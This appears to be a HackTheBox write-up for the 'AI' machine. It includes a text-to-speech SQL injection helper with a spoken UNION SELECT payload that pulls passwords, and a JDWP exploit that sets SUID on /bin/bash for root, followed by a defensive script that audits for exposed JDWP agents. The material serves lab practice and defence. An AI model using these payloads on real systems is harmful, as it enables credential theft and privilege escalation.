AI @ HackTheBox
AI is a 30-point machine on HackTheBox that involves SQL injection via speech and abusing an exposed Java debugging port.
Notes
SQL injection helper:
```python
#!/usr/bin/env python3
import subprocess
import requests
import shutil
import json
import sys

msg = sys.argv[1]

# text to speech
headers = {'Content-type': 'application/x-www-form-urlencoded'}
url = 'https://ttsmp3.com/makemp3_new.php'
r = requests.post(url, data={'msg': msg, 'lang': 'Joey', 'source': 'ttsmp3'}, headers=headers)

# download result
url = json.loads(r.text)['URL']
r = requests.get(url, stream=True)
with open('tmp.mp3', 'wb') as f:
    shutil.copyfileobj(r.raw, f)

# convert (-y overwrites a tmp.wav left over from a previous run)
subprocess.call(['ffmpeg', '-y', '-i', 'tmp.mp3', 'tmp.wav'])

# upload & check result
url = 'http://ai.htb/ai.php'
with open('tmp.wav', 'rb') as wav:
    r = requests.post(url, files={'fileToUpload': wav}, data={'submit': 'Process It!'})
print(r.text)
```
Use the helper to get the user's password:
```
python3 inject.py 'open single kwote. union select password from users comment database'
```
Exploit JDWP (with port forwarded to localhost):
```
searchsploit -x jdwp
searchsploit -m exploits/java/remote/46501.py
python 46501.py -t localhost -p 8000 --cmd "chmod u+s /bin/bash"
curl http://127.0.0.1:8005
/bin/bash -p
```
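On the defensive side, the following added example (not part of the original write-up) audits a process listing for JVMs started with a listening JDWP agent, the misconfiguration abused above. The `user pid command` input format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re

# Both the modern (-agentlib) and legacy (-Xrunjdwp) ways of loading the agent.
JDWP_RE = re.compile(r'(?:-agentlib:jdwp=|-Xrunjdwp:)(\S+)')
LOOPBACK = {'localhost', '127.0.0.1', '[::1]'}

# Constructed sample input in "user pid command" form (not taken from the box).
SAMPLE_PS = [
    'root 891 java -Xdebug -Xrunjdwp:transport=dt_socket,address=localhost:8000,server=y,suspend=n -jar app.jar',
    'app 1200 java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 -jar svc.jar',
    'app 1300 java -jar plain.jar',
    'dev 1400 java -agentlib:jdwp=transport=dt_socket,server=n,address=10.0.0.5:5005 -jar c.jar',
]

def parse_jdwp(cmdline):
    """Return the JDWP agent options as a dict, or None if no agent is loaded."""
    m = JDWP_RE.search(cmdline)
    if m is None:
        return None
    return dict(kv.split('=', 1) for kv in m.group(1).split(',') if '=' in kv)

def audit(ps_lines):
    """Return (user, pid, address, findings) for every JVM that listens for a debugger."""
    results = []
    for line in ps_lines:
        user, pid, cmdline = line.split(None, 2)
        opts = parse_jdwp(cmdline)
        # server=n (the default) means the JVM dials out and opens no listener.
        if not opts or opts.get('server') != 'y':
            continue
        address = opts.get('address', '')
        host = address.rpartition(':')[0]
        findings = []
        if host in LOOPBACK:
            findings.append('loopback only, but JDWP is unauthenticated: any local user can attach')
        else:
            findings.append('not pinned to loopback: may be reachable from the network')
        if user == 'root':
            findings.append('JVM runs as root: an attached debugger can run code as root')
        results.append((user, int(pid), address, findings))
    return results

if __name__ == '__main__':
    for user, pid, address, findings in audit(SAMPLE_PS):
        print(f'{user} pid={pid} jdwp={address}')
        for finding in findings:
            print(f'  - {finding}')
```

On a real host, feed it the output of `ps -eo user,pid,args`; the fix for any hit is to remove the agent option from production start-up scripts.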
This post is licensed under CC BY 4.0 by the author.